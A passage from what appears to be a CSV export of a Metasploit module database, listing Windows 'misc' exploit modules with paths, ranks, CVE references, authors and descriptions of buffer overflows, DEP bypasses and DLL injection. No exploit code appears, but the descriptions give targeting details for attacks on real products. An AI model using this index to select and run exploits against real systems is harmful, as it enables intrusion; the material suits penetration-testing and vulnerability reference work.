00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/bigant_server_usv.rb","exploit","windows/misc/bigant_server_usv","exploit/windows/misc/bigant_server_usv","BigAnt Server 2.52 USV Buffer Overflow",500,"This exploits a stack buffer overflow in the BigAnt Messaging Service, part of the BigAnt Server product suite. This module was tested successfully against version 2.52. 
NOTE: The AntServer service does not restart, you only get one shot.","Metasploit Framework License (BSD)","t","2009-12-29 00:00:00",0,,"aggressive","t","EDB-10765, EDB-10973, OSVDB-61386","DouBle_Zer0, Lincoln, jduck " 934,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/bomberclone_overflow.rb","exploit","windows/misc/bomberclone_overflow","exploit/windows/misc/bomberclone_overflow","Bomberclone 0.11.6 Buffer Overflow",200,"This module exploits a stack buffer overflow in Bomberclone 0.11.6 for Windows. The return address is overwritten with the address of lstrcpyA; the second and third values are the destination buffer, and the fourth value is the source address of our buffer on the stack. This exploit works like a return-into-libc attack. ATTENTION: the shellcode is executed ONLY when someone tries to close Bomberclone.","Metasploit Framework License (BSD)","f","2006-02-16 00:00:00",,,"aggressive","t","BID-16697, CVE-2006-0460, OSVDB-23263, URL-http://www.frsirt.com/english/advisories/2006/0643","Jacopo Cervini " 935,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/bopup_comm.rb","exploit","windows/misc/bopup_comm","exploit/windows/misc/bopup_comm","Bopup Communications Server Buffer Overflow",400,"This module exploits a stack buffer overflow in Bopup Communications Server 3.2.26.5460. By sending a specially crafted packet, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","t","2009-06-18 00:00:00",0,,"aggressive","t","CVE-2009-2227, EDB-9002, OSVDB-55275, URL-http://www.blabsoft.com/products/server","MC " 936,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/borland_interbase.rb","exploit","windows/misc/borland_interbase","exploit/windows/misc/borland_interbase","Borland Interbase Create-Request Buffer Overflow",200,"This module exploits a stack buffer overflow in Borland Interbase 2007. 
By sending a specially crafted create-request packet, a remote attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","t","2007-07-24 00:00:00",0,,"aggressive","t","CVE-2007-3566, OSVDB-38602, URL-http://dvlabs.tippingpoint.com/advisory/TPTI-07-13","MC " 937,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/borland_starteam.rb","exploit","windows/misc/borland_starteam","exploit/windows/misc/borland_starteam","Borland CaliberRM StarTeam Multicast Service Buffer Overflow",200,"This module exploits a stack buffer overflow in Borland CaliberRM 2006. By sending a specially crafted GET request to the STMulticastService, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","t","2008-04-02 00:00:00",0,,"aggressive","t","BID-28602, CVE-2008-0311, OSVDB-44039","MC " 938,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/citrix_streamprocess.rb","exploit","windows/misc/citrix_streamprocess","exploit/windows/misc/citrix_streamprocess","Citrix Provisioning Services 5.6 streamprocess.exe Buffer Overflow",400,"This module exploits a stack buffer overflow in Citrix Provisioning Services 5.6. 
By sending a specially crafted packet to the Provisioning Services server, a fixed length buffer on the stack can be overflowed and arbitrary code can be executed.","Metasploit Framework License (BSD)","t","2011-01-20 00:00:00",0,,"aggressive","t","OSVDB-70597, URL-http://secunia.com/advisories/42954/, URL-http://support.citrix.com/article/CTX127149, URL-http://www.zerodayinitiative.com/advisories/ZDI-11-023/","mog" 939,"2013-05-23 08:20:18","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/citrix_streamprocess_data_msg.rb","exploit","windows/misc/citrix_streamprocess_data_msg","exploit/windows/misc/citrix_streamprocess_data_msg","Citrix Provisioning Services 5.6 SP1 Streamprocess Opcode 0x40020000 Buffer Overflow",300,"This module exploits a remote buffer overflow in the Citrix Provisioning Services 5.6 SP1 (without Hotfix CPVS56SP1E043) by sending a malformed packet to the 6905/UDP port. The module has been successfully tested on Windows Server 2003 SP2, Windows 7, and Windows XP SP3.","Metasploit Framework License (BSD)","t","2011-11-04 00:00:00",0,,"aggressive","t","BID-49803, OSVDB-75780, URL-http://support.citrix.com/article/CTX130846, URL-http://www.zerodayinitiative.com/advisories/ZDI-12-009","AbdulAziz Hariri, alino <26alino@gmail.com>" 940,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/citrix_streamprocess_get_boot_record_request.rb","exploit","windows/misc/citrix_streamprocess_get_boot_record_request","exploit/windows/misc/citrix_streamprocess_get_boot_record_request","Citrix Provisioning Services 5.6 SP1 Streamprocess Opcode 0x40020004 Buffer Overflow",300,"This module exploits a remote buffer overflow in the Citrix Provisioning Services 5.6 SP1 (without Hotfix CPVS56SP1E043) by sending a malformed packet with the opcode 0x40020004 (GetBootRecordRequest) to the 6905/UDP port. 
The module, which allows code execution under the context of SYSTEM, has been successfully tested on Windows Server 2003 SP2 and Windows XP SP3.","Metasploit Framework License (BSD)","t","2011-11-04 00:00:00",0,,"aggressive","t","BID-49803, OSVDB-75780, URL-http://support.citrix.com/article/CTX130846","alino <26alino@gmail.com>, juan vazquez " 941,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/citrix_streamprocess_get_footer.rb","exploit","windows/misc/citrix_streamprocess_get_footer","exploit/windows/misc/citrix_streamprocess_get_footer","Citrix Provisioning Services 5.6 SP1 Streamprocess Opcode 0x40020002 Buffer Overflow",300,"This module exploits a remote buffer overflow in the Citrix Provisioning Services 5.6 SP1 (without Hotfix CPVS56SP1E043) by sending a malformed packet with the opcode 0x40020002 (GetFooterRequest) to the 6905/UDP port. The module, which allows code execution under the context of SYSTEM, has been successfully tested on Windows Server 2003 SP2 and Windows XP SP3.","Metasploit Framework License (BSD)","t","2011-11-04 00:00:00",0,,"aggressive","t","BID-49803, OSVDB-75780, URL-http://support.citrix.com/article/CTX130846","alino <26alino@gmail.com>, juan vazquez " 942,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/citrix_streamprocess_get_objects.rb","exploit","windows/misc/citrix_streamprocess_get_objects","exploit/windows/misc/citrix_streamprocess_get_objects","Citrix Provisioning Services 5.6 SP1 Streamprocess Opcode 0x40020006 Buffer Overflow",300,"This module exploits a remote buffer overflow in the Citrix Provisioning Services 5.6 SP1 (without Hotfix CPVS56SP1E043) by sending a malformed packet with the opcode 0x40020006 (GetObjetsRequest) to the 6905/UDP port. 
The module, which allows code execution under the context of SYSTEM, has been successfully tested on Windows Server 2003 SP2 and Windows XP SP3.","Metasploit Framework License (BSD)","t","2011-11-04 00:00:00",0,,"aggressive","t","BID-49803, OSVDB-75780, URL-http://support.citrix.com/article/CTX130846, URL-http://www.zerodayinitiative.com/advisories/ZDI-12-010/","Anyway , alino <26alino@gmail.com>, juan vazquez " 943,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/doubletake.rb","exploit","windows/misc/doubletake","exploit/windows/misc/doubletake","DoubleTake/HP StorageWorks Storage Mirroring Service Authentication Overflow",200,"This module exploits a stack buffer overflow in the authentication mechanism of NSI Doubletake which is also rebranded as HP Storage Works. This vulnerability was found by Titon of Bastard Labs.","Metasploit Framework License (BSD)","f","2008-06-04 00:00:00",0,,"aggressive","t","CVE-2008-1661, OSVDB-45924","ri0t " 944,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/eiqnetworks_esa.rb","exploit","windows/misc/eiqnetworks_esa","exploit/windows/misc/eiqnetworks_esa","eIQNetworks ESA License Manager LICMGR_ADDLICENSE Overflow",200,"This module exploits a stack buffer overflow in eIQnetworks Enterprise Security Analyzer. During the processing of long arguments to the LICMGR_ADDLICENSE command, a stack-based buffer overflow occurs. 
This module has only been tested against ESA v2.1.13.","Metasploit Framework License (BSD)","f","2006-07-24 00:00:00",,,"aggressive","t","BID-19163, CVE-2006-3838, OSVDB-27526, URL-http://www.zerodayinitiative.com/advisories/ZDI-06-024.html","MC , kf , ri0t " 945,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/eiqnetworks_esa_topology.rb","exploit","windows/misc/eiqnetworks_esa_topology","exploit/windows/misc/eiqnetworks_esa_topology","eIQNetworks ESA Topology DELETEDEVICE Overflow",200,"This module exploits a stack buffer overflow in eIQnetworks Enterprise Security Analyzer. During the processing of long arguments to the DELETEDEVICE command in the Topology server, a stack-based buffer overflow occurs. This module has only been tested against ESA v2.1.13.","Metasploit Framework License (BSD)","f","2006-07-25 00:00:00",,,"aggressive","t","BID-19164, CVE-2006-3838, OSVDB-27528","MC " 946,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/enterasys_netsight_syslog_bof.rb","exploit","windows/misc/enterasys_netsight_syslog_bof","exploit/windows/misc/enterasys_netsight_syslog_bof","Enterasys NetSight nssyslogd.exe Buffer Overflow",300,"This module exploits a stack buffer overflow in Enterasys NetSight. The vulnerability exists in the Syslog service (nssyslogd.exe) when parsing a specially crafted PRIO from a syslog message. 
The module has been tested successfully on Enterasys NetSight 4.0.1.34 over Windows XP SP3 and Windows 2003 SP2.","Metasploit Framework License (BSD)","t","2011-12-19 00:00:00",1,,"aggressive","t","BID-51124, CVE-2011-5227, OSVDB-77971, URL-http://www.zerodayinitiative.com/advisories/ZDI-11-350/, URL-https://cp-enterasys.kb.net/article.aspx?article=14206&p=1","Jeremy Brown, juan vazquez , rgod " 947,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/eureka_mail_err.rb","exploit","windows/misc/eureka_mail_err","exploit/windows/misc/eureka_mail_err","Eureka Email 2.2q ERR Remote Buffer Overflow",300,"This module exploits a buffer overflow in the Eureka Email 2.2q client that is triggered through an excessively long ERR message. NOTE: this exploit isn't very reliable. Unfortunately reaching the vulnerable code can only be done when manually checking mail (Ctrl-M). Checking at startup will not reach the code targeted here.","Metasploit Framework License (BSD)","f","2009-10-22 00:00:00",0,,"passive","t","CVE-2009-3837, EDB-10235, OSVDB-59262","Dr_IDE, Francis Provencher (Protek Research Labs), dookie, jduck " 948,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/fb_cnct_group.rb","exploit","windows/misc/fb_cnct_group","exploit/windows/misc/fb_cnct_group","Firebird Relational Database CNCT Group Number Buffer Overflow",300,"This module exploits a vulnerability in Firebird SQL Server. A specially crafted packet can be sent which will overwrite a pointer allowing the attacker to control where data is read from. Shortly, following the controlled read, the pointer is called resulting in code execution. The vulnerability exists with a group number extracted from the CNCT information, which is sent by the client, and whose size is not properly checked. This module uses an existing call to memcpy, just prior to the vulnerable code, which allows a small amount of data to be written to the stack. 
A two-phase stack pivot allows execution of the ROP chain, which ultimately calls VirtualAlloc to bypass DEP.","Metasploit Framework License (BSD)","t","2013-01-31 00:00:00",0,,"aggressive","t","CVE-2013-2492","Spencer McIntyre" 949,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/fb_isc_attach_database.rb","exploit","windows/misc/fb_isc_attach_database","exploit/windows/misc/fb_isc_attach_database","Firebird Relational Database isc_attach_database() Buffer Overflow",200,"This module exploits a stack buffer overflow in Firebird (a fork of Borland InterBase) by sending a specially crafted attach request.","Metasploit Framework License (BSD)","t","2007-10-03 00:00:00",1,,"aggressive","t","BID-25917, CVE-2007-5243, OSVDB-38607, URL-http://www.risesecurity.org/advisories/RISE-2007002.txt","Adriano Lima , Ramon de C Valle " 950,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/fb_isc_create_database.rb","exploit","windows/misc/fb_isc_create_database","exploit/windows/misc/fb_isc_create_database","Firebird Relational Database isc_create_database() Buffer Overflow",200,"This module exploits a stack buffer overflow in Firebird (a fork of Borland InterBase) by sending a specially crafted create request.","Metasploit Framework License (BSD)","t","2007-10-03 00:00:00",1,,"aggressive","t","BID-25917, CVE-2007-5243, OSVDB-38606, URL-http://www.risesecurity.org/advisories/RISE-2007002.txt","Adriano Lima , Ramon de C Valle " 951,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/fb_svc_attach.rb","exploit","windows/misc/fb_svc_attach","exploit/windows/misc/fb_svc_attach","Firebird Relational Database SVC_attach() Buffer Overflow",200,"This module exploits a stack buffer overflow in Firebird (a fork of Borland InterBase) by sending a specially crafted service attach request.","Metasploit Framework License (BSD)","t","2007-10-03 00:00:00",1,,"aggressive","t","BID-25917, CVE-2007-5243, OSVDB-38605, 
URL-http://www.risesecurity.org/advisories/RISE-2007002.txt","Adriano Lima , Ramon de C Valle " 952,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/gimp_script_fu.rb","exploit","windows/misc/gimp_script_fu","exploit/windows/misc/gimp_script_fu","GIMP script-fu Server Buffer Overflow",300,"This module exploits a buffer overflow in the script-fu server component on GIMP <= 2.6.12. By sending a specially crafted packet, an attacker may be able to achieve remote code execution under the context of the user. This module has been tested on GIMP for Windows from installers provided by Jernej Simoncic.","Metasploit Framework License (BSD)","t","2012-05-18 00:00:00",0,,"aggressive","t","BID-53741, CVE-2012-2763, EDB-18956, OSVDB-82429, URL-http://www.reactionpenetrationtesting.co.uk/advisories/scriptfu-buffer-overflow-GIMP-2.6.html","Joseph Sheridan, juan vazquez " 953,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/hp_dataprotector_dtbclslogin.rb","exploit","windows/misc/hp_dataprotector_dtbclslogin","exploit/windows/misc/hp_dataprotector_dtbclslogin","HP Data Protector DtbClsLogin Buffer Overflow",300,"This module exploits a stack buffer overflow in HP Data Protector 4.0 SP1. The overflow occurs during the login process, in the DtbClsLogin function provided by the dpwindtb.dll component, where the Utf8Cpy (strcpy like function) is used in an insecure way with the username. 
A successful exploitation will lead to code execution with the privileges of the ""dpwinsdr.exe"" (HP Data Protector Express Domain Server Service) process, which runs as SYSTEM by default.","Metasploit Framework License (BSD)","t","2010-09-09 00:00:00",0,,"aggressive","t","BID-43105, CVE-2010-3007, OSVDB-67973, URL-http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02498535, URL-http://www.zerodayinitiative.com/advisories/ZDI-10-174/","AbdulAziz Hariri, juan vazquez " 954,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/hp_dataprotector_new_folder.rb","exploit","windows/misc/hp_dataprotector_new_folder","exploit/windows/misc/hp_dataprotector_new_folder","HP Data Protector Create New Folder Buffer Overflow",300,"This module exploits a stack buffer overflow in HP Data Protector 5. The overflow occurs in the creation of new folders, where the name of the folder is handled in an insecure way by the dpwindtb.dll component. While the overflow occurs on the stack, the folder name is split into fragments by this insecure copy. Because of this, the module uses egg hunting to search for a non-corrupted copy of the payload in the heap. Moreover, the overflowed buffer is stored in a frame protected by stack cookies, so an SEH handler overwrite is used. Any user of HP Data Protector Express is able to create new folders and trigger the vulnerability. Moreover, in the default installation the 'Admin' user has an empty password. 
Successful exploitation will lead to code execution with the privileges of the ""dpwinsdr.exe"" (HP Data Protector Express Domain Server Service) process, which runs as SYSTEM by default.","Metasploit Framework License (BSD)","t","2012-03-12 00:00:00",0,,"aggressive","t","BID-52431, CVE-2012-0124, OSVDB-80105, URL-http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c03229235, URL-https://community.rapid7.com/community/metasploit/blog/2012/07/06/an-example-of-egghunting-to-exploit-cve-2012-0124","juan vazquez , sinn3r " 955,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/hp_imc_uam.rb","exploit","windows/misc/hp_imc_uam","exploit/windows/misc/hp_imc_uam","HP Intelligent Management Center UAM Buffer Overflow",300,"This module exploits a remote buffer overflow in HP Intelligent Management Center UAM. The vulnerability exists in the uam.exe component, when using sprintf in an insecure way for logging purposes. The vulnerability can be triggered by sending a malformed packet to the 1811/UDP port. The module has been successfully tested on HP iMC 5.0 E0101 and UAM 5.0 E0102 over Windows Server 2003 SP2 (DEP bypass).","Metasploit Framework License (BSD)","t","2012-08-29 00:00:00",0,,"aggressive","t","BID-55271, OSVDB-85060, URL-http://www.zerodayinitiative.com/advisories/ZDI-12-171, URL-https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c03589863","e6af8de8b1d4b2b6d5ba2610cbf9cd38, juan vazquez , sinn3r " 956,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/hp_magentservice.rb","exploit","windows/misc/hp_magentservice","exploit/windows/misc/hp_magentservice","HP Diagnostics Server magentservice.exe Overflow",200,"This module exploits a stack buffer overflow in HP Diagnostics Server magentservice.exe service. By sending a specially crafted packet, an attacker may be able to execute arbitrary code. 
Originally found and posted by AbdulAziz Hariri via ZDI.","Metasploit Framework License (BSD)","t","2012-01-12 00:00:00",0,,"aggressive","t","CVE-2011-4789, OSVDB-72815, URL-http://www.zerodayinitiative.com/advisories/ZDI-12-016/","AbdulAziz Hariri, hal" 957,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/hp_omniinet_1.rb","exploit","windows/misc/hp_omniinet_1","exploit/windows/misc/hp_omniinet_1","HP OmniInet.exe MSG_PROTOCOL Buffer Overflow",500,"This module exploits a stack-based buffer overflow in the Hewlett-Packard OmniInet NT Service. By sending a specially crafted MSG_PROTOCOL (0x010b) packet, a remote attacker may be able to execute arbitrary code with elevated privileges. This service is installed with HP OpenView Data Protector, HP Application Recovery Manager and potentially other products. This exploit has been tested against versions 6.1, 6.0, and 5.50 of Data Protector, and versions 6.0 and 6.1 of Application Recovery Manager. NOTE: There are actually two consecutive wcscpy() calls in the program (which may be why ZDI considered them two separate issues). However, this module only exploits the first one.","Metasploit Framework License (BSD)","t","2009-12-17 00:00:00",0,,"aggressive","t","BID-37396, CVE-2007-2280, OSVDB-61206, URL-http://www.zerodayinitiative.com/advisories/ZDI-09-099","EgiX , Fairuzan Roslan , jduck " 958,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/hp_omniinet_2.rb","exploit","windows/misc/hp_omniinet_2","exploit/windows/misc/hp_omniinet_2","HP OmniInet.exe MSG_PROTOCOL Buffer Overflow",500,"This module exploits a stack-based buffer overflow in the Hewlett-Packard OmniInet NT Service. By sending a specially crafted MSG_PROTOCOL (0x010b) packet, a remote attacker may be able to execute arbitrary code with elevated privileges. This service is installed with HP OpenView Data Protector, HP Application Recovery Manager and potentially other products. 
This exploit has been tested against versions 6.1, 6.0, and 5.50 of Data Protector, and versions 6.0 and 6.1 of Application Recovery Manager. NOTE: There are actually two consecutive wcscpy() calls in the program (which may be why ZDI considered them two separate issues). However, this module only exploits the second one.","Metasploit Framework License (BSD)","t","2009-12-17 00:00:00",0,,"aggressive","t","BID-37250, CVE-2009-3844, OSVDB-60852, URL-http://www.zerodayinitiative.com/advisories/ZDI-09-091","EgiX , Fairuzan Roslan , jduck " 959,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/hp_omniinet_3.rb","exploit","windows/misc/hp_omniinet_3","exploit/windows/misc/hp_omniinet_3","HP OmniInet.exe Opcode 27 Buffer Overflow",500,"This module exploits a buffer overflow in the Hewlett-Packard OmniInet NT Service. By sending a specially crafted opcode 27 packet, a remote attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","t","2011-06-29 00:00:00",0,,"aggressive","t","CVE-2011-1865, OSVDB-73571, URL-http://www.coresecurity.com/content/HP-Data-Protector-multiple-vulnerabilities","MC " 960,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/hp_omniinet_4.rb","exploit","windows/misc/hp_omniinet_4","exploit/windows/misc/hp_omniinet_4","HP OmniInet.exe Opcode 20 Buffer Overflow",400,"This module exploits a vulnerability found in HP Data Protector's OmniInet process. By supplying a long string of data as the file path with opcode '20', a buffer overflow can occur when this data is written on the stack without proper bounds checking beforehand, which results in arbitrary code execution under the context of SYSTEM. 
This module also targets systems such as Windows Server 2003 or Windows Server 2008 that have DEP and/or ASLR enabled by default.","Metasploit Framework License (BSD)","f","2011-06-29 00:00:00",0,,"aggressive","t","CVE-2011-1865, EDB-17468, OSVDB-73571, URL-http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02872182, URL-http://www.coresecurity.com/content/HP-Data-Protector-multiple-vulnerabilities","Oren Isacson, corelanc0d3r , dookie, muts, sinn3r " 961,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/hp_operations_agent_coda_34.rb","exploit","windows/misc/hp_operations_agent_coda_34","exploit/windows/misc/hp_operations_agent_coda_34","HP Operations Agent Opcode coda.exe 0x34 Buffer Overflow",300,"This module exploits a buffer overflow vulnerability in HP Operations Agent for Windows. The vulnerability exists in the HP Software Performance Core Program component (coda.exe) when parsing requests for the 0x34 opcode. This module has been tested successfully on HP Operations Agent 11.00 over Windows XP SP3 and Windows 2003 SP2 (DEP bypass). The coda.exe component listens only on localhost by default; network access must be granted through its configuration for it to be remotely exploitable. It also listens on a random TCP port, so a check function is provided to ease reconnaissance.","Metasploit Framework License (BSD)","t","2012-07-09 00:00:00",1,,"aggressive","t","BID-54362, CVE-2012-2019, OSVDB-83673, URL-http://www.zerodayinitiative.com/advisories/ZDI-12-114/","Luigi Auriemma, juan vazquez " 962,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/hp_operations_agent_coda_8c.rb","exploit","windows/misc/hp_operations_agent_coda_8c","exploit/windows/misc/hp_operations_agent_coda_8c","HP Operations Agent Opcode coda.exe 0x8c Buffer Overflow",300,"This module exploits a buffer overflow vulnerability in HP Operations Agent for Windows. 
The vulnerability exists in the HP Software Performance Core Program component (coda.exe) when parsing requests for the 0x8c opcode. This module has been tested successfully on HP Operations Agent 11.00 over Windows XP SP3 and Windows 2003 SP2 (DEP bypass). The coda.exe component listens only on localhost by default; network access must be granted through its configuration for it to be remotely exploitable. It also listens on a random TCP port, so a check function is provided to ease reconnaissance.","Metasploit Framework License (BSD)","t","2012-07-09 00:00:00",1,,"aggressive","t","BID-54362, CVE-2012-2020, OSVDB-83674, URL-http://www.zerodayinitiative.com/advisories/ZDI-12-115/","Luigi Auriemma, juan vazquez " 963,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/hp_ovtrace.rb","exploit","windows/misc/hp_ovtrace","exploit/windows/misc/hp_ovtrace","HP OpenView Operations OVTrace Buffer Overflow",200,"This module exploits a stack buffer overflow in HP OpenView Operations version A.07.50. 
By sending a specially crafted packet, a remote attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","t","2007-08-09 00:00:00",0,,"aggressive","t","BID-25255, CVE-2007-3872, OSVDB-39527","MC " 964,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/ib_isc_attach_database.rb","exploit","windows/misc/ib_isc_attach_database","exploit/windows/misc/ib_isc_attach_database","Borland InterBase isc_attach_database() Buffer Overflow",400,"This module exploits a stack buffer overflow in Borland InterBase by sending a specially crafted attach request.","Metasploit Framework License (BSD)","t","2007-10-03 00:00:00",0,,"aggressive","t","BID-25917, CVE-2007-5243, OSVDB-38607, URL-http://www.risesecurity.org/advisories/RISE-2007002.txt","Adriano Lima , Ramon de C Valle " 965,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/ib_isc_create_database.rb","exploit","windows/misc/ib_isc_create_database","exploit/windows/misc/ib_isc_create_database","Borland InterBase isc_create_database() Buffer Overflow",400,"This module exploits a stack buffer overflow in Borland InterBase by sending a specially crafted create request.","Metasploit Framework License (BSD)","t","2007-10-03 00:00:00",0,,"aggressive","t","BID-25917, CVE-2007-5243, OSVDB-38606, URL-http://www.risesecurity.org/advisories/RISE-2007002.txt","Adriano Lima , Ramon de C Valle " 966,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/ib_svc_attach.rb","exploit","windows/misc/ib_svc_attach","exploit/windows/misc/ib_svc_attach","Borland InterBase SVC_attach() Buffer Overflow",400,"This module exploits a stack buffer overflow in Borland InterBase by sending a specially crafted service attach request.","Metasploit Framework License (BSD)","t","2007-10-03 00:00:00",0,,"aggressive","t","BID-25917, CVE-2007-5243, OSVDB-38605, URL-http://www.risesecurity.org/advisories/RISE-2007002.txt","Adriano Lima , Ramon de 
C Valle " 967,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/ibm_cognos_tm1admsd_bof.rb","exploit","windows/misc/ibm_cognos_tm1admsd_bof","exploit/windows/misc/ibm_cognos_tm1admsd_bof","IBM Cognos tm1admsd.exe Overflow",300,"This module exploits a stack buffer overflow in IBM Cognos Analytic Server Admin service. The vulnerability exists in the tm1admsd.exe component, due to a dangerous copy of user controlled data to the stack, via memcpy, without validating the supplied length and data. The module has been tested successfully on IBM Cognos Express 9.5 over Windows XP SP3.","Metasploit Framework License (BSD)","t","2012-04-02 00:00:00",0,,"aggressive","t","BID-52847, CVE-2012-0202, OSVDB-80876, URL-http://www-01.ibm.com/support/docview.wss?uid=swg21590314, URL-http://www.zerodayinitiative.com/advisories/ZDI-12-101/","Unknown, juan vazquez " 968,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/ibm_director_cim_dllinject.rb","exploit","windows/misc/ibm_director_cim_dllinject","exploit/windows/misc/ibm_director_cim_dllinject","IBM System Director Agent DLL Injection",600,"This module abuses the ""wmicimsv"" service on IBM System Director Agent 5.20.3 to accomplish arbitrary DLL injection and execute arbitrary code with SYSTEM privileges. In order to accomplish remote DLL injection it uses a WebDAV service as disclosed by kingcope in December 2012. Because of this, the target host must have the WebClient service (WebDAV Mini-Redirector) enabled. 
It is enabled and automatically started by default on Windows XP SP3, but disabled by default on Windows 2003 SP2.","Metasploit Framework License (BSD)","t","2009-03-10 00:00:00",0,,"passive","t","BID-34065, CVE-2009-0880, OSVDB-52616, OSVDB-88102, URL-http://seclists.org/bugtraq/2012/Dec/5, URL-https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20090305-2_IBM_director_privilege_escalation.txt","Bernhard Mueller, juan vazquez , kingcope" 969,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/ibm_tsm_cad_ping.rb","exploit","windows/misc/ibm_tsm_cad_ping","exploit/windows/misc/ibm_tsm_cad_ping","IBM Tivoli Storage Manager Express CAD Service Buffer Overflow",400,"This module exploits a stack buffer overflow in the IBM Tivoli Storage Manager Express CAD Service. By sending a ""ping"" packet containing a long string, an attacker can execute arbitrary code. NOTE: the dsmcad.exe service must be in a particular state (CadWaitingStatus = 1) in order for the vulnerable code to be reached. This state doesn't appear to be reachable when the TSM server is not running. This service does not restart.","Metasploit Framework License (BSD)","t","2009-11-04 00:00:00",0,,"aggressive","t","CVE-2009-3853, OSVDB-59632","jduck " 970,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/ibm_tsm_rca_dicugetidentify.rb","exploit","windows/misc/ibm_tsm_rca_dicugetidentify","exploit/windows/misc/ibm_tsm_rca_dicugetidentify","IBM Tivoli Storage Manager Express RCA Service Buffer Overflow",500,"This module exploits a stack buffer overflow in the IBM Tivoli Storage Manager Express Remote Client Agent service. By sending a ""dicuGetIdentify"" request packet containing a long NodeName parameter, an attacker can execute arbitrary code. NOTE: this exploit first connects to the CAD service to start the RCA service and obtain the port number on which it runs. 
This service does not restart.","Metasploit Framework License (BSD)","t","2009-11-04 00:00:00",0,,"aggressive","t","BID-34803, CVE-2008-4828, OSVDB-54232","jduck " 971,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/itunes_extm3u_bof.rb","exploit","windows/misc/itunes_extm3u_bof","exploit/windows/misc/itunes_extm3u_bof","Apple iTunes 10 Extended M3U Stack Buffer Overflow",300,"This module exploits a stack buffer overflow in iTunes 10.4.0.80 to 10.6.1.7. When opening an extended .m3u file containing an ""#EXTINF:"" tag description, iTunes will copy the content after ""#EXTINF:"" without appropriate checking from a heap buffer to a stack buffer, writing beyond the stack buffer's boundary, which allows code execution under the context of the user. Please note before using this exploit, you must have precise knowledge of the victim machine's QuickTime version (if installed), and then select your target accordingly. In addition, even though this exploit can be used as remote, you should be aware of the victim's browser behavior when opening an itms link. For example, IE/Firefox/Opera by default will ask the user for permission before launching the itms link by iTunes. Chrome will ask for permission, but also displays a warning. Safari would be an ideal target, because it will open the link without any user interaction.","Metasploit Framework License (BSD)","f","2012-06-21 00:00:00",,,"passive","t","EDB-19322, OSVDB-83220, URL-http://pastehtml.com/view/c25uhk4ab.html","Rh0 , sinn3r " 972,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/landesk_aolnsrvr.rb","exploit","windows/misc/landesk_aolnsrvr","exploit/windows/misc/landesk_aolnsrvr","LANDesk Management Suite 8.7 Alert Service Buffer Overflow",200,"This module exploits a stack buffer overflow in LANDesk Management Suite 8.7. 
